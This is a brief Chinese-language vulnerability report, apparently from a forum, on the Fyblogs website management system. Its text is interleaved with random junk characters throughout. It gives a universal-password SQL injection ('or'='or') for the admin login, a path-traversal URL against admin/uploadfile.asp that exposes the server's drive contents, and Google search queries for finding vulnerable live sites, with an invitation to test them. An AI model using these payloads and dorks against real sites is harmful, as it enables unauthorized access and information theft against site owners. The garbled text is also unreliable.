漏洞类型: 未授权访问/权限绕过
0 t4 w6 N8 U4 N4 ^. Y; k% ]# u- s: C3 x/ c2 F3 t; ]& B0 T5 p
简要描述:8 \+ ]! h* W0 }) P5 c% Y
* j$ y0 ?" Y; A. _4 o) u1 C& [
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
6 w' i8 f' w$ a# O6 s. N( }2 E$ [1 z. O }
详细说明:1 }& |, C* `7 v/ U' \; Z# N
) g" x' ], |; n8 x! T
后台万能密码 'or'='or'9 w0 z0 S: Y# l( Q. n1 [
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!' z+ Q0 I5 F. _' z9 t$ t* e( x
admin/uploadfile.asp?currentFolder=/upfiles/../) Z8 k) C3 H) v; G
L( p8 D6 x( c4 z, i% o漏洞证明:2 V' v1 n9 c A0 q0 b, O; H
' t" I9 Q0 I9 K/ o7 `谷歌:inurl:type.asp?id=1 新闻中心0 h8 I: g- `+ O) c/ \9 q
或者 :inurl:download_ok.asp?) \8 g9 a9 A4 {7 s k& W& p
3 [2 q! t. |8 b+ c4 Y可以测试
. [. d. e" T2 b4 d+ _5 L, S. l3 Q
- I8 }% \7 ]2 g5 z7 A; L0 _$ \
|